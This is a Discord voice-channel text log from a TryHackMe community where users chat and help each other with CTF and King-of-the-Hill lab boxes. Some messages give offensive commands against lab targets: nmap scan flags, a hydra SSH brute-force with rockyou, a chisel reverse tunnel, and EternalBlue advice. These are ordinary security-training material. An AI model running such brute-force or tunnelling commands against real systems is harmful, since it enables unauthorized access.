#voice-chat

1 messages · Page 16 of 1

near sage
jade fossil
#

@jade fossil how??
@west siren He showed it to all blobheart

west siren
#

lol

#

password off what?

west siren
#

ohhh

near sage
candid carbon
#

||Good one||

west siren
#

@plucky vault why don't you change it ?

#

lol

candid carbon
#

I think they should ban us

summer cloud
shell spear
plucky vault
#

top quality

summer cloud
summer cloud
hazy temple
#

sure ehy not

buoyant lichen
candid carbon
#

bord cauli

hazy temple
tawny adder
#

What

nova mulch
#

anyone gonna do a room ?

#

or just talking about random stuff ?

hazy temple
#

random

#

nmap -h

#

nmap -sS

#

-sV

#

-p(ports)

#

-T4(intense scan)

#

-A(Aggressive scan)

#

-vvv(shows only open ports)

#

-oX(8)

#

-Pn(no.15)

nova mulch
lofty moat
#

for admin panel on tryhackme ^^

nova mulch
#

I knew I shouldn t have clicked, but I wanted to 😄

jade fossil
#

< >

candid loom
nova mulch
lofty moat
#

that ftp one is for gcrawford i think

#

yeah i think

#

i think he privesced but i just nyancat him

#

which user you trying at?

#

try directly rcambell

#

that's a bit faster

#

not sure why its taking too long for you

#

restart it

#

maybe you are doing something wrong?

robust harbor
#

hydra -l rcambell -P /opt/rockyou.txt ssh://10.10.119.63 -I

lofty moat
#

use -t 64

#

also username is wrong

#

its rcampbell

#

lol

#

what?

#

oh

#

i think other guy changed the password

#

he did

#

i can change it back if you want

#

changed back the password if you wanna try again

#

it will give you password in 2-3 minutes

#

password for rcambell is: ||miriam||

#

you in yet?

#

sure

#

send me the invite link

#

except windows

#

noooo

#

don't want to run eternal blue

west siren
tame ether
#

@quiet needle you ok? I think you've been in afk voice since yesterday kekw

fresh solar
#

Yeah, was wondering the same thing ^

#

Pretty sure I saw him in afk yesterday around the time voice chat party was happening 😄

tame ether
#

He went afk and it automoved him from the party to afk

fresh solar
#

Yeah

vapid spire
#

Yeah I saw that

#

I am also thinking same why he is in afk since yesterday kekw

lofty moat
#

he fell asleep like i did

west siren
#

lol

#

rickrool

#

?

lofty moat
#

imma hackerman

#

I own that thing

west siren
#

ohhh

lofty moat
#

JK

west siren
#

like link shortener/?

lofty moat
#

its THM official rick roll i guess

west siren
#

lol

lofty moat
west siren
#

lol

#

rickroll'd

plucky vault
#

13

full sapphire
#

He went afk and it automoved him from the party to afk
@tame ether mods should be immune to that. Someone must have been trolling 😆

plucky vault
tame ether
candid carbon
#

@spark trail Don't talk

#

Please!

vapid spire
golden gale
#

some problem with my network

golden gale
#

@candid carbon

candid carbon
#

Yeah

golden gale
#

go in the terminal

#

now check for the answer

#

http......

#

they are not looking for the command

west siren
hot forge
#

Anyone on voice support for help

plucky vault
#

with what

hot forge
#

I am facing a problem with metasploit

#

Need help

plucky vault
#

metasploit room?

limber lichen
#

I am facing a problem with metasploit
@hot forge You can ask directly rather than asking to ask

hot forge
#

Ok

dull jolt
#

hw can join voice chat?

quiet needle
#

You need to verify with the bot

#

!docs verify

trim cloudBOT
quiet needle
#

@dull jolt ^ (:

dull jolt
#

ye sir

#

i am here

quiet needle
#

You need to sync yout THM profile with your Discord account before you can join the voice chat

#

the link above tells you how to do so (:

dull jolt
#

ok

#

thanks

dusky canyon
#

what is this rickroll all about?

waxen cave
#

I heard it lifts you up and never lets you down.

west siren
#

v

#

starts in one hour

#

anyone can join regardless of skill level

livid kestrel
#

hey sorry my mic isn't working

heavy latch
#

@west siren

west siren
#

yeaa

#

if u wannnt

#

send me the link

#

cant find yaa

heavy latch
zealous leaf
#

guys can somone help with some networking OSPF stuff?

zenith cradle
supple trellis
alpine zephyr
#

@supple trellis thanks, it helped

west siren
#

-bash: ls: No such file or directory
??/?

old kite
#

ctf

#

?

west siren
#

no

#

koth

near sage
west siren
#

-bash: ls: No such file or directory
??

manic canyon
#

What happened to rocket league :(

steady oracle
#
Medium

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew.

manic canyon
#

@candid carbon in my opinion you should start rocket league up and continue playing

west siren
#

u guys from vxc wannaa play?

manic canyon
#

404 go to KOTH if you want KOTH

#

C’mon show us a flip reset @candid carbon

#

Oh damn you’re actually cracked

#

Nah it’s smooth

#

Damn that’s unfortunate, I gotta head out Peace

steady oracle
#

How to get verified?
Step 1
Go on https://tryhackme.com/profile and find your Discord Token.
Step 2
DM me using the command !verify <token> using the token you just retrieved.
Step 3
You should now be verified on the TryHackMe Discord server!

autumn quest
#

@quiet needle

still spindle
#

💯

quiet needle
#

I've got no idea what that is

autumn quest
#

Nor do I

#

Hence I can't tell if it's appropriate

quiet needle
#

Please keep it english, least not this isn't a spotify playlist

#

Aye, deleted.

still spindle
#

Why

#

I want you to have fun 😉

quiet needle
#

We keep things appropriate and pg-13 here

autumn quest
#

As it's not in English we can't judge it.

still spindle
#

Well, I respect your opinion

quiet needle
#

We have no way of ensuring that in anything that isn't English

#

It ain't my opinion - it's how things work around here to be honest

still spindle
#

Well, it's okay, I'm from Saudi Arabia

autumn quest
#

That's great. Just stick to English so there aren't any misunderstandings! 🙂

still spindle
#

👍

quiet needle
abstract raft
#

U guys removed streaming?

#

sed lyf

#

why

hot snow
#

It’s not removed

fresh solar
#

You need to be verified to stream.

misty carbon
#

Hello!

#

Wow.

#

Where can I get one?

autumn quest
misty carbon
#

Ty.

prime garnet
#

hey

#

what

#

username

barren olive
#

?

prime garnet
#

MyDOnut

barren olive
#

anyone heard me ?

leaden notch
#

no

barren olive
#

dam

leaden notch
#

@unkempt junco can you talk?

unkempt junco
#

English is not my primary language so my speaking is really bad

leaden notch
#

idc. im not a native either

#

just come in for the fun 🙂

prime garnet
#

mee too

#

there news on my house

#

so it will noisy

leaden notch
#

yea np

#

but @unkempt junco could talk 🙂

prime garnet
#

its easy brother

barren olive
#

I think chat is ok

prime garnet
#

i love that

barren olive
#

I can't talk

leaden notch
#

yes

barren olive
#

yeah

#

is anyone streaming ?

prime garnet
#

nope

barren olive
#

ah ok

#

I don't wanna lose while people are watching me XD

prime garnet
#

lol

#

did you find vuln

unkempt junco
#

I could share my screen

leaden notch
#

i dont find anything

prime garnet
#

I could share my screen
@unkempt junco hey

#

i cant rdp

#

what you did

#

diy you patch it

unkempt junco
#

I didnt patch anything

#

I just used metasploit with eternalblue. Use the psexec exploit or you will crash the box

prime garnet
#

i know

#

i did

#

i got it

#

see th sitr

#

what is the command use to find foles i meterpreter

leaden notch
#

FUCK YES IM IN!

barren olive
#

dam I'm strugling

prime garnet
#

psi

leaden notch
#

did i just kick you out of your shells?

#

@unkempt junco how did you lock king.txt??

unkempt junco
#

attrib -R

leaden notch
#

nice to know. thx

#

gg @unkempt junco ^^

#

nice game

unkempt junco
#

Gg

prime garnet
#

let me king

barren olive
#

hey

#

I mean are you in

#

nvm

#

ah

#

not here ?

#

ah ok

#

yeah yeah

#

I still trying

prime garnet
#

ah kx

#

you lose me

#

lol

#

another match

#

i were the one eho logged first

barren olive
#

I'm in the box now

prime garnet
#

gg guyz

#

I'm in the box now
@barren olive wooe

barren olive
#

ahhh

#

a flag

#

finally

#

tha twas so hard

#

F

plucky vault
#

valorant?

supple trellis
#

first thing you install is neofetch? 😄 @plucky vault

plucky vault
#

@supple trellis yes to check ram

#

usage

#

its less then xubuntu

#

so im probably gonna be changing to manjaro

west siren
#

whats going on @plucky vault

plucky vault
#

im not sure

#

xD

plucky vault
#

test

prime garnet
#

hi

#

is some one up for a koth

hazy temple
#

hey

prime garnet
#

hi

#

join guy

prime garnet
proper kestrel
#

.

limber lichen
#

.

plucky vault
#

murii

full sapphire
plucky vault
#

this is so entertaining

dreamy rock
#

which box is he doing?

plucky vault
#

i think ubuntu

dreamy rock
#

I mean room.

olive spire
#

gaming server

plucky vault
#

oh... i don't know man

dreamy rock
#

Yep.

#

You should've .tar.gz generated after building the alpine-build. Dont start python server before that.

#

do 'ls -la'

plucky vault
#

I'm new to all of this, so i'm trying to learn from this. But I have one question, do you get tasks asigned from THM? And you need to complete them with you linux vm?

dreamy rock
#

You assign a room yourself from thm, and then you complete tasks

autumn quest
#

You join rooms (I would suggest the Welcome Room) and complete tasks on the room. But I would recommend a VM with Kali

plucky vault
#

aaaah, okay. And what kind of tasks? Like hacking servers? And you can hack them however you want?

#

and kali is the best option

autumn quest
#

No

#

THM has rooms

#

the rooms have deployable machines

#

the machines are the targets

#

they have a specific exploit

#

some walk you through, some are a challenge

plucky vault
#

mhm mhm

autumn quest
#

The Welcome Room explains all

plucky vault
#

thank youcoolguy Legend

#

same, 12AM gang

upper matrix
#

slush slush

autumn quest
#

Oh jesus

#

I'm having a seizure

plucky vault
#

congratulations

#

nice work

#

very educational too

#

paper is safest

waxen cave
#

That slush is terrible.

upper matrix
#

Love you guys

plucky vault
#

!rank

trim cloudBOT
#
TryHackMe
Rank

Mining Bitcoin...

Username:

apexpredator311

Rank:

79577

Points:

8

Subscribed?

No!

upper matrix
#

Did anyone solve Crossfit the HTB

manic canyon
#

You might wanna ask them

tame ether
upper matrix
#

Apparently their user names I can't remember 🙂

lofty moat
#

ask in their discord he meant.

sand agate
#

@zenith halo

#

we did, where's the money? kekw

zenith halo
#

we did, where's the money? kekw
@sand agate not me payin

sand agate
#

He was the one who asked

zenith halo
#

@sand agate not me payin
@zenith halo was some murican

sand agate
#

Juiced

zenith halo
#

oh lol

#

ye where my money

autumn quest
#

I've heard money?

zenith halo
zenith halo
#

he said he pay 500$ if we do a box

autumn quest
#

For him?

#

suspect

zenith halo
#

was a bet we couldn't win because we noobs

autumn quest
#

I see

zenith halo
#

i'm a noob idk about other

autumn quest
#

Says the unverified dude.

#

Anyway you got proof?

#

(pretty much you won't get your money. Unlikely he'll ever come back online)

zenith halo
#

ye

#

we didnt do it

#

just jokin

autumn quest
#

You should have said yes kekw

zenith halo
#

we did haha

#

but is obv we didnt do

#

new box on htb

autumn quest
#

I see aha

#

You can talk about HTB here

zenith halo
#

it seems harder than tryhackme

#

less guidance

lofty moat
#

it seems harder than tryhackme
just don't read tasks while doing a room and then tell me?

zenith halo
#

heh

upper matrix
#

@zenith halo and @sand agate you guys didn't get it

#

show me proof and I pay $500

sand agate
#

I haven't even tried it yet

tame ether
#

lol

#

is this about crossfit?

#

gib $500 blobknife

autumn quest
#

Ew crossfit

tame ether
#

shh it was an interesting one kekw

upper matrix
#

lol

#

proof @tame ether

tame ether
#

Lmao check my htb profile, it has the same name

tame ether
#

@upper matrix why are you so interested in that box btw? kekw

upper matrix
#

I'm not just the one that had the bounty on it

#

$500 looks like no winners

tame ether
#

lmao

buoyant lichen
#

I can take the $500

#

if nobody wants it

tame ether
#

but did you solve crossfit swa? kekw

buoyant lichen
#

suuuure

tame ether
#

proof blobknife

autumn quest
buoyant lichen
#

I didn't get a picture doing crossfit today

autumn quest
#

Crossfit sucks

upper matrix
#

lol

buoyant lichen
upper matrix
#

@tame ether ok ok I see you

tame ether
#

i don't understand why you want to pay people who solved the machine GWbruhThonkery

upper matrix
#

But how many actual pushups did you get

buoyant lichen
#

75

#

in one go

tame ether
#

0

upper matrix
#

That is a lot @buoyant lichen

buoyant lichen
#

I know

#

I am strong

#

I do crossfit every other day

upper matrix
#

@tame ether it was a joke they had to complete that day and ofcourse they couldn't so we were just having fun

#

Looks like takes 2 days for user and root though 😮

tame ether
#

that machine was a paaaaaaaaaaaaaain to get anything on it

#

we were stuck for a while on it

upper matrix
#

"we" who is we

fresh solar
#

Sounds fun ghostblobgib

tame ether
#

we meaning alphapwners

upper matrix
#

how many hours did u spent per day

autumn quest
#

Cross fit is bad

#

Lift weights

#

Get swole

tame ether
#

we spent like 8 hours since release, took a break and then we came back when we had time

#

we didn't root it the intended way tho kekw

upper matrix
#

ohh

tame ether
#

and unintended was way more painful than the intended one

autumn quest
#

But this is my usual crossfit face
@buoyant lichen fake plates

upper matrix
#

will they leave unintended way

tame ether
#

i thnk they were going to patch it

upper matrix
#

nice

fast wind
#

Hey @surreal hound

surreal hound
#

Hi

fast wind
west siren
#

@flint gate what r u guys doing?

flint gate
#

im cool

#

what bout you

west siren
#

nm

#

what r u guys doing in vc?

flint gate
#

chiling

sand agate
#

vcing

misty coyote
#

Ara araa

#

😂 I'm wondering wt a voice chat here will look like

sullen gull
#

you're hacking me?

#

@marble cape you hacking me?

hot snow
#

Why would you ping dark for no reason?

marble cape
#

Please stop pinging admins without reason

sullen gull
#

ok

#

you're hacking me?

#

/bin

#

/work

#

/bin/work

hot snow
#

Nobody is hacking you

rough flax
#

very cool, kanye

warm atlas
#

👀

#

who the hell will hack u at work

autumn quest
royal gust
#

Hacking at work? That sounds like a fun game vs coworkers

#

But i'd be sure to get proof of informed consent (like all parties know what they are getting into)

#

FOr example: Thou shalt not redirect all web requests for business purposes to random return thumbnails of specialty model live-streaming websites

#

to segregate business purposes .. anything going through the proxy at XYZ is safe

sage tree
#

Hello!
I just want to finish the room Intro the x86-64 but I have some questions.
Someone who finished the room?

scenic crag
#

Hello!
I just want to finish the room Intro the x86-64 but I have some questions.
Someone who finished the room?
@sage tree
go to #room-help

polar raven
#

Billion, try to go to that path

#

Environment.GetEnvironmentVariable("USERPROFILE"); will return C:\Users\<User>
Try it :D

#

Not sure if that method works good aswell with / on windows

#

Billion, always check with File
And catch the error if any

tawny jungle
#

Voice Chat is so lonely

#

@upper matrix Where did you get the 500$ from??

autumn quest
#

@tawny jungle Good luck, you won't ever get the money

vital fjord
#

hey guys anyone uo for a voice?

frigid hornet
#

@vital fjord wanna join

vital fjord
#

sure

frigid hornet
#

@vital fjord i am here again

#

@vital fjord hey man

spiral whale
#

hi

eager lark
#

hoho

autumn holly
vital fjord
#

hello chat

pastel pollen
#

hey anyone there?

vital fjord
#

voice chat is so silent, anyone up?

royal gust
#

Mourning! (I'm a yank, and a lazy one at athat)

polar raven
#

How that we're so many?? ❔

muted sand
#

Because Jeff is the best box

supple trellis
#

too guessy 😛

muted sand
#

Barely 😂

#

It’s a little

#

🤷‍♂️

#

Easy for me to root I just ssh root@ip kekw

supple trellis
#

@royal gust ```--------Attacker-------

./chisel server -p 8081 -reverse

-after connection

ftp localhost:9000

--------Client --------
./chisel client <ip>:8081 -R:9000:<ip>:21```

muted sand
#

Some serious over complication

#

Wordpress docker image go brrr

#

Such a trash image, regret using it

royal gust
#

Whats over complication

#

@supple trellis I tried somethign to that effect

muted sand
#

Using chisel, is over complicating it.

royal gust
#

yessir. i believe it

safe plover
#

love notion ❤️ @fossil estuary

vital fjord
#

hello there

royal gust
#

@plucky vault gimme a sec

plucky vault
#

could I ask about cryptography topic?

royal gust
#

Is this a room specific question or just cryptographic theory

plucky vault
#

I'm looking for a cryptography algorithm where in I could sign a message on a tree, and can be use to verify any node on that tree.

royal gust
#

look into merkle i guess

#

as for a source code implementation .. i dunno.. bitcoin maybe?

plucky vault
#

Hallo

#

Can i ask some question ?

#

yes

#

what flag outputs all entries when use ls

#

-a ?

#

ok ... i am idiot 😄

untold drum
#

Hello friends

plucky vault
#

tipsfedora Hey

sudden pilot
#

can someone help me stress test my VPN server?

plucky vault
#

hallo

#

or only 3 month

hot snow
#

@plucky vault Paypal can only do 3 months, you can subscribe for a month by paying with a debit

plucky vault
#

ok ok 🙂 thx for answer

#

touch *.txt is binary ?

#

is for binary ?

#

./.... ?

plucky vault
#

hm 😦

plucky vault
#

any help on this ? 😄 I'm not gonna leave you without one final little parting gift. This is a penetration site, and it wouldn't feel right if I didn't hide a flag. There's one flag on this machine and it's in /root/root.txt, everything you need to get there is in this room, So I leave you with this. Good luck and have fun! 🙂

hot snow
plucky vault
#

tx

maiden glacier
#

!blue

lofty moat
#

@slender kayak my internet sucks so i cant talk.. can barely hear you.

slender kayak
#

just saying that i don't play koth since at least last month

lofty moat
#

now i can hear you

#

me too

#

thanks

#

its cool role xD

autumn quest
#

<@&756155733468512386>

#

@lofty moat Is cheating

lofty moat
#

Don't tell them xD

#

No havent played much of it
(answering mentats in vc)

autumn quest
#

I'm joking

lofty moat
#

I'm joking
@autumn quest 🤫

#

sure..

#

oh good luck

#

nice

#

what will it be about?

#

nice.. sounds good

#

no spoilers xD

#

looking forward to that..

#

sure.. send me

#

🙂

#

which CTF?

#

Daaamn nice

#

try installing rustscan

#

its better for koth

#

specially hogwarts

#

i have tried hogwarts.. but never rooted it

slender kayak
#

😦

lofty moat
#

i'm on mobile data.. new place so no internet connection yet. gonna take a day or two

#

Home country.. moved to a new house(apartment).

#

with friends

#

my parents pay for everything xD

#

just here coz i'm studying out of the city

#

bachelors in computer science

#

last year

#

gonna do masters in cyber sec after that

#

not patching anything

#

nothing is patched by me

#

not sure about others

slender kayak
#

don't know why, but rustscan is not working

#

rustscan -b 924 $ip

#

well...........................

#

machine reset.

#

they broke the machine again 😦

limber lichen
#

This looks so weird now that I don't have context of the other person on vc KEKW @lofty moat

paper steppe
#

@lofty moat lol

#

u didn't see my 245 million ping

lofty moat
fresh solar
#

Oh wow @full sapphire in voice chat

full sapphire
#

smh

vapid spire
#

👀 what's going on

fresh solar
#

Oh wow Muir speaking

vapid spire
#

Wow I will join

#

Lmao

#

Everyone joined

#

I am here to listen muir voice

fresh solar
#

He moved to staff voice chat

lofty moat
#

i came, everyone left cri

formal garnet
#

heheh

vital fjord
#

hello there

dark igloo
#

hi

buoyant lichen
#

You all have been noted

candid carbon
#

Noted what?

buoyant lichen
#

no need to get sus

candid carbon
#

sus?

#

@buoyant lichen xD Did you ban the linux guy?

quiet needle
#

No. I did.

#

They've been given the appeals procedure, that's the end of that.

vital fjord
#

anyone up for voice chat?

plucky vault
#

I am.

#

I'm in the voice chat now.

plucky vault
#

KOTH anyone?

warm atlas
#

hoi

coral hawk
#

hey im like really noob can someone can help me pls

plucky vault
#

Hey Hypernoob, I will.

#

Gotta reboot, one moment.

coral hawk
#

pls

#

yes i try to use the browser maching and i got a error

#

desktop

#

i have but me inglish is shit

#

i dink in 30 meaby

plucky vault
#

I'm not a peasent. I don't hop on dirty boxes.

coral hawk
#

but the problem is when i ganna use the vm in the site, amm the browser machine

#

both

#

same problem

fervent maple
#

which one you like more kali or attack?

plucky vault
#

There's a difference between the attack and kali machine??

#

Ohhh.

#

Is the attack machine new is it?

coral hawk
#

kali i like it more

plucky vault
#

pwnbox?

rough flax
#

kali and the attack box are different

#

I prefer the attack box

plucky vault
#

pwnbox is attackbox.
Edit: similar

rough flax
#

no

plucky vault
#

I like the honestry.

#

honesty

#

///

rough flax
#

pwnbox is built off parrot

#

attackbox is built off ubuntu

plucky vault
#

Just use that kali machine on your pentests since you don't have to pay for Burpsuite.

#

pro

rough flax
#

you dont have to pay for burp community edition anyways

#

you dont get burp pro with kali

plucky vault
#

Pro is always better though.

rough flax
#

you dont get it for free though

fossil estuary
#

🤔️can't get the attack box to work atm

coral hawk
#

you can do ssh

#

i dont know we can do that XD so thats cool i do that not a problem

plucky vault
#

I can't even connect to the VPN. -.-

coral hawk
#

bye

#

i ssh

#

becouse browser dont work

plucky vault
#

Yay, it worked.

#

Hopefully I can connect to the machine now.

coral hawk
#

thank u guys for the help

fossil estuary
#

ah nvm was brave

coral hawk
#

what?

#

firefox

#

yep

#

o men i gonna feal so stupid if that work XD

#

to arp?

fossil estuary
#

rdp

plucky vault
#

microsoft remote desktop?

#

remmina.

coral hawk
#

cool thank u !

plucky vault
#

I use microsoft remote desktop at work.

coral hawk
#

im a grafic card okno

plucky vault
#

You're a graphics cards?

coral hawk
#

lol its works!!

#

yes

#

like the one i can not pay for a gtx 1080 XD

#

well thaks a lot

#

i gona study a little more thanks !

fervent maple
#

I gtg guys cya around

plucky vault
#

See ya later.

tame ivy
#

HTB > THM

real orbit
#

very cool, Kanye.

fresh solar
#

THM != HTB
@tame ivy fixed that for you

#

They're different platforms and have a different way of educating people, htb is more challenge oriented, while thm focuses more on education, a direct comparison of such two platforms is illogical.

exotic moon
#

^

#

I personally think if you learn anything from either platform its a win. The fact that the resources exist is great. I personally have used both and have no problem supporting what both are doing for the community. I guess in summary why is it a choice when exposure to concepts doesn't have to be a solo platform space.

tame ivy
#

@fresh solar spot on

umbral ridge
#

They're different platforms and have a different way of educating people, htb is more challenge oriented, while thm focuses more on education, a direct comparison of such two platforms is illogical.
@fresh solar Couldn't have said it any better. Comparing HTB to THM is really lame. That being said I'd still go for THM, as we all know knowledge is power, and before you attempt in getting into those challenges you have to put some knowledge, in which THM has done a great job in terms of guidance, it picks you up from the very bottom and makes you somewhat decent. While if you are new into that, jumping straight to HTB you will suffer a lot and be confused to the point where you will get demotivated and eventually quit

lone viper
#

compare an apple with another such apple as much as you can / want, but comparing an apple with orange won't count ,

cursive herald
#

Please stop discussing non-PG13 stuff @rugged merlin @plucky vault @jade fossil. This is a strictly PG13 server, this rule applies to voice chat too 🙂

jade fossil
#

I'm not saying anything bingBlank

summer cloud
honest tide
#

whats going on here?

lofty moat
#

0day flexing his Mercedes kekw

#

(mean while i don't even know how to spell it)

hot snow
#

You spelt it right

fast wind
#

wut is goin on

heady harness
#

Thanks for the help

lofty moat
#

@midnight fern you forgot to wash your hands..

midnight fern
#

It's rona' season, no need.

#

We're all screwed

#

@lofty moat

#

haha

lofty moat
#

lmao

#

btw you were using your left hand for that.

#

you had mobile phone in your right, and left hand for other thingy.

midnight fern
muted sand
#

Maybe he’s left handed kekw

modest spruce
#

@ocean ledge use -u before url

#

@ocean ledge you got the first key?

ocean ledge
#

what key? 😅

modest spruce
#

on mr robot ctf

#

no, the first Answer

#

on ctf

#

are you doing the mr robot ctf right?

#

owww, understand

#

on robots.txt have one wordlist dic

#

is that key that i was talking about

ocean ledge
#

ERROR: Could not find a version that satisfies the requirement cipheycore<0.4.0,>=0.3.1 (from ciphey) (from versions: 0.0.1)
ERROR: No matching distribution found for cipheycore<0.4.0,>=0.3.1 (from ciphey)

zenith cradle
cursive herald
#

hi

#

author if ciphey here

#

if you're having problems with it:

#

that cipheycore issue is probably caused by either using python 3.9 or Windows 32bit Python btw

zenith cradle
#

that cipheycore issue is probably caused by either using python 3.9 or Windows 32bit Python btw
@cursive herald the version is 64bit

#

but yeah, it's using python 3.9

cursive herald
#

windows?

zenith cradle
#

yep

cursive herald
#

ahh

zenith cradle
#

is it that much changes from 3.8 to 3.9?

cursive herald
#

we do not have a release for cipheycore for windows python 3.9 🙂

#

No, cipheycore is C++ code so we need to rebuild it for every Python release on every platform cri

zenith cradle
#

g2g y'all

#

@ocean ledge nite

ocean ledge
#

goodnight thanks for the tips

#

grep -iRl

plucky vault
#

hello

#

I'm at work right now.

vital fjord
#

voice chats are so silent these days

distant hare
#

anyone wanna talk

fathom night
#

im new if you can help me ...

distant hare
#

ok

#

are you in my game?

fathom night
#

??

distant hare
#

like in koth

fathom night
#

oh no on my way

distant hare
#

join plz

plucky vault
#

ggs @candid carbon xd

flat bison
#

Is it a demo?

quasi pawn
#

what are you making

distant hare
#

anyone wanna talk

lofty moat
dark igloo
#

i'm french i can't, my english is bad tho

grand yacht
#

a stream within a stream

flat bison
#

Is it a stream about a demo?

#

i'm french i can't, my english is bad tho
@dark igloo
I am in the same situation

dark igloo
#

oh

#

tu peux rejoindre le vocal si tu veux

#

@flat bison but, ur english is just bad or u are french ?

flat bison
#

My English is a bit better, but I don't feel like speaking today

dark igloo
#

ok ok ^^

muted dirge
#

SimpleHTTPServer

#

python -m SimpleHTTPServer

#

default 8000

muted dirge
#

this voice chat is so wholesome blobheart

jade fossil
buoyant lichen
#

@ me or any mod if there are any issues in the VC (esp. user-to-user ones)

fervent maple
#

dark is there any good way to improve nc shell from a windows target that allows tab auto complete and ctrl c without killing the shell

distant hare
#

i need advice, so in madrid they modified an ubuntu and the kernel is very outdated. They have the vulnerability CVE-2019-13272 and i dont know how to report it

old kite
#

Dark sounds like John Hammond LOL

hot snow
#

Sort of yea xD

tawdry cypress
#

dark's voice is cute blobheart

muted dirge
#

So like a Risk Analysis?

plucky vault
#

Ohhhh insightful info 😄

muted dirge
#

I would love a talk like that. There is a really big gap of specialists in the Security field

vapid spire
#

Damn nice

tawdry cypress
#

I have a weird question, one thing my sec head told me was that sometimes we cannot be like very blunt about the vulnerabilities of client's infra, cause they don't like that sometimes. How much did u see something like this in ur part of the world?

plucky vault
#

THM podcasts when?

muted dirge
#

I love this insight in the field. A podcast type of thing would be awesome

old kite
#

I think we should help Juice blobheart

rough flax
#

dark's voice is cute blobheart
@tawdry cypress darks a cutie can confirm

tawdry cypress
#

cry approves. kekw

muted dirge
#

Lma that's exactly what I am doing at my Masters CybserSec program haha

#

A lot oof outdated crypto

#

and outdated privacy models

#

etc

tawdry cypress
#

he was so hesitant saying he joined "hack the box" lmao kekw

rough flax
#

@marble cape reeee

distant hare
#

plz i need advice, so in madrid they modified an ubuntu and the kernel is very outdated. They have the vulnerability CVE-2019-13272 and i dont know how to report it

hot snow
#

Dark gave it to you but you're deafened

tawdry cypress
#

I don't like to replace keyboards often.

vapid spire
#

I have laptop

#

So unfortunately I can't

young gate
#

my laptop got the mic broken....

#

doesnt even process mic input at all

plucky vault
#

"try harder" only goes so far before you plateau and burn out

rough flax
#

darks voice sounds very sexy currently

vapid spire
#

Now it's leggy and cry fault

tawdry cypress
#

"try harder" only goes so far before you plateau and burn out
@plucky vault so true.

distant hare
#

dark, can you repeat plz

plucky vault
#

I have wasted alot of time learning how to hack, then I found THM and it offers so much information that is great, and direction. The one thing most online tutorials miss is good direction.

vapid spire
#

I am also thinking about his voice now 😅

tawdry cypress
#

like, "you don't know what you don't know"

#

0x100 = 0

marble cape
old kite
#

@marble cape 'Make Hacking Great Again' coolguy

west siren
#

whats going onNn??

marble cape
rough flax
#

The guys who got arrested on a physical?

plucky vault
#

oh boy, that one

tawdry cypress
#

"google it"~James

rough flax
#

that was an interesting case

plucky vault
#

yeah, jeez..

west siren
#

v

#

whatsss going onnnnnn

fossil estuary
west siren
#

whats going onn?

austere viper
#

lol @dark igloo

dark igloo
#

^^

old kite
#

😆

upbeat inlet
#

lmfao @dark igloo

vapid spire
#

Darknet one is nice

muted dirge
#

Poor Glass, he was overshadowed

stark gulch
#

it was all politics between the sherrif and the prosecuters, big mess

austere viper
#

Thanks @marble cape !

plucky vault
#

Great talk Dark 🙂

tawdry cypress
#

loved Darks cute voice

vapid spire
#

Thanks a lot

old kite
#

Thanks

tawdry cypress
#

:bye

marble cape
#

👋

tawdry cypress
#

yep.

mental knoll
rough flax
#

I would stay but I’m actually in class rn

#

Just popped in to hear darks sexy voice

plucky vault
#

you don't need to change the path btw

autumn quest
#

what the heck is going on

vapid spire
#

Have to listen to dark hex?

tawdry cypress
#

dark was talking

vapid spire
#

With cute voice

autumn quest
#

I see

vapid spire
#

You missed 👀

autumn quest
#

I'm not fussed, I'll just call his pager and his cell KEKW

plucky vault
#

windows' is super dumb with how they execute unquoted paths. for example C:/this is my service/service.exe tries C:/this, then C:/this is, and then C:/this is my before finally landing on C:/this is my service/service.exe

marble cape
#

...wat hex

muted dirge
#

Did anyone from here do Jack box? How doable is it?

autumn quest
#

...wat hex
@marble cape Eminem lyrics KEKW

#

Dear Dark, I wrote you but still ain't callin' I left my cell, my pager, and my home phone at the bottom I sent two letters back in autumn, you must not-a got 'em There probably was a problem at the post office or somethin'

full sapphire
#

Did anyone from here do Jack box? How doable is it?
@muted dirge The only real difficulty is in your choice of wordlist

#

The one you want comes installed with Kali, but is not Rockyou

muted dirge
#

hmm interesting. there is a bunch of pre-available wordlists so I will have to see

#

So basically stay away from rockyou

full sapphire
#

Yep, exactly

#

The one you're after is tiny in comparison

dark igloo
#

i said League of legends

plucky vault
#

it's a harsh box, fairly certain there's a path traversal somewhere there

#

it's not lol

#

@slender kayak you mispelt javascript: btw

#

I went via the data uri path but it didn't register for whatever reason

#

-A means, iirc -O -sV -sC ?

#

you're gonna hate this but there's a solution without LFI involved

austere viper
plucky vault
#

jesus

#

300k

#

yeesh, that's not a backup..

#

it's not just that, you also have to take into account floods and earthquakes

raven verge
plucky vault
#

team 197

#

it wasn't even, it was actually just yourefired

#

it was found in the indeed database dump of 2012

slender kayak
plucky vault
#

I haven't tried many other hard boxes but from experience YotP's surprisingly simple. it's just really easy to over think

austere viper
#

This is a beginner box based on simple enumeration of services and basic privilege escalation techniques. Based Jake

muted dirge
plucky vault
#

yeah I haven't done anonymous playground yet

#

btw there's a threading option, -t

muted dirge
#

the normal 10 is too much?

plucky vault
#

no it's normally too little lol

#

even on a slow server 50's pretty stable

#

dirbuster's "go faster" option fires off 200 iirc

muted dirge
#

oh ok

#

good to know

plucky vault
#

that image looks super sus

#

tbh I'd file && cat it

#

try steghide, usually works

#

not always

#

have you tried file lol

#

because if firefox isn't accepting it as a valid jpg then there's probably something weird involved

compact scaffold
#

FF D8 FF E0 00 10 4A 46 49 46 00 01 01 00 00 48

plucky vault
#

try wfuzz, it's free

compact scaffold
#

for i in $(seq 1 100); do echo $i; done

plucky vault
#

or just seq 100

supple trellis
#

@muted dirge wfuzz -c -z range,1-100 <url>?secret=FUZZ to do faster

plucky vault
#

later

#

oof.

#

sorry to hear that

#

oh frick you're in italy

ashen prism
#

What is the name of the column on the far left side Metasploit room

austere viper
plucky vault
#

it may just be that the password's the password, try rot-13 somewhere else?

mighty moon
#

There is a rot47 function

#

You want that.

#

Not basic rot

candid carbon
#

@ashen prism The name Is # and whenever I write # It give me an unknown command

mighty moon
#

Use the cyberchef rot47 and test that

#

@muted dirge

plucky vault
#

they tried that

ashen prism
#

@candid carbon That's the answer of the question if you type # you will get it right

candid carbon
#

Damn I'm dumb.

ashen prism
#

Yeah I was trying to tell but there were many people talking so I stopped xD

candid carbon
#

xD

plucky vault
#

I mean, it's a png rather than jpg

#

what if it's literally just "rotten" rot-10'd lol

candid carbon
#

@ashen prism What does Lhost means?

ashen prism
#

LHOST means Local Host , your machine IP the one with vpn in this case

